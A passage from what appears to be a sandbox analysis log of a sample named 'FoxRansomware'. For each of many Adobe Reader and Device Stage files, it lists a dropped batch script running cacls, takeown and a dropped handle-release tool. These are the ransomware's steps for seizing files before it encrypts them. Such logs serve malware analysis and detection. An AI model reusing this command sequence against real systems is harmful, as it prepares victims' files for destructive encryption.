    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" | PID 2980 | Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "Identity-V" -nobanner | PID 3084 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "Identity-V" -nobanner | PID 3980 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1592 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"" | PID 2240 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C | PID 2224
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" | PID 1056 | Modifies file permissions
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MyriadPro-Bold.otf" -nobanner | PID 2356 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "MyriadPro-Bold.otf" -nobanner | PID 2428 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3960 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"" | PID 2604 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C | PID 280
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" | PID 4024
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SC_Reader.exe" -nobanner | PID 2464 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "SC_Reader.exe" -nobanner | PID 2972 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3344 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"" | PID 2396 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C | PID 2032
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" | PID 1864
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "brt55.ths" -nobanner | PID 2176 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "brt55.ths" -nobanner | PID 3392 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3440 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"" | PID 2628 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C | PID 2564
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" | PID 2496
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "usa03.hsp" -nobanner | PID 2460 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "usa03.hsp" -nobanner | PID 760 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1724 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"" | PID 2368 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C | PID 3232
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" | PID 3180 | Modifies file permissions
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CYRILLIC.TXT" -nobanner | PID 2108 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "CYRILLIC.TXT" -nobanner | PID 1052 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2528 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"" | PID 2552 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C | PID 1760
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" | PID 2852
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CP1252.TXT" -nobanner | PID 3204 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "CP1252.TXT" -nobanner | PID 3740 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3612 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"" | PID 2424 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C | PID 1668
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" | PID 2916 | Modifies file permissions
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "directories.acrodata" -nobanner | PID 3096 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "directories.acrodata" -nobanner | PID 1588 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3000 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"" | PID 3284 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C | PID 1528
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" | PID 976
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ended_review_or_form.gif" -nobanner | PID 2492 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "ended_review_or_form.gif" -nobanner | PID 2584 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3808 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"" | PID 3876 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C | PID 3148
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" | PID 2036
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "reviewers.gif" -nobanner | PID 3552 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "reviewers.gif" -nobanner | PID 3956 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3772 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"" | PID 4016 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C | PID 584
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" | PID 1532
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "server_lg.gif" -nobanner | PID 3720 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "server_lg.gif" -nobanner | PID 3036 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2172 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"" | PID 2184 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C | PID 2904
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" | PID 3236
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "turnOnNotificationInTray.gif" -nobanner | PID 2116 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "turnOnNotificationInTray.gif" -nobanner | PID 2328 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3896 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"" | PID 3624 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C | PID 3596
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" | PID 888
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MinionPro-Bold.otf" -nobanner | PID 3752 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "MinionPro-Bold.otf" -nobanner | PID 3356 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 284 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"" | PID 3796 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C | PID 1948
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" | PID 2836 | Modifies file permissions
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "zy______.pfm" -nobanner | PID 3564 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "zy______.pfm" -nobanner | PID 2944 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1784 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"" | PID 2012 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C | PID 3048
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" | PID 588
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "brt.fca" -nobanner | PID 3304 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "brt.fca" -nobanner | PID 1920 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2092 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"" | PID 676
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C | PID 1976
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" | PID 1856
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "eng.hyp" -nobanner | PID 3504
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "eng.hyp" -nobanner | PID 968 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2228

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"" | PID 1560
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C | PID 3020
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" | PID 1216
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "zdingbat.txt" -nobanner | PID 952
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "zdingbat.txt" -nobanner | PID 2484
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3500

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"" | PID 4060
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C | PID 2280
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" | PID 664
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "TURKISH.TXT" -nobanner | PID 268
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "TURKISH.TXT" -nobanner | PID 3076
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2724

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"" | PID 3100
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C | PID 3516
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" | PID 1048 | Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "behavior.xml" -nobanner | PID 3704
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "behavior.xml" -nobanner | PID 3708
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3348

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"" | PID 884
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C | PID 3156
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" | PID 4048 | Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 3848
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 3040
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 4044

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"" | PID 3416
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C | PID 612
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" | PID 3728 | Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 3864
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 2936
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3084

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"" | PID 3476
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C | PID 3300
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" | PID 1688 | Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "watermark.png" -nobanner | PID 3452
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "watermark.png" -nobanner | PID 2780
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2356

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"" | PID 3652
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C | PID 852
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" | PID 3568 | Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 2348
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 1672
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3136

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"" | PID 2464
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C | PID 3116
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" | PID 2996 | Modifies file permissions
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "br.gif" -nobanner | PID 2288
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "br.gif" -nobanner | PID 3008
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3140

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"" | PID 3268
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C | PID 3388
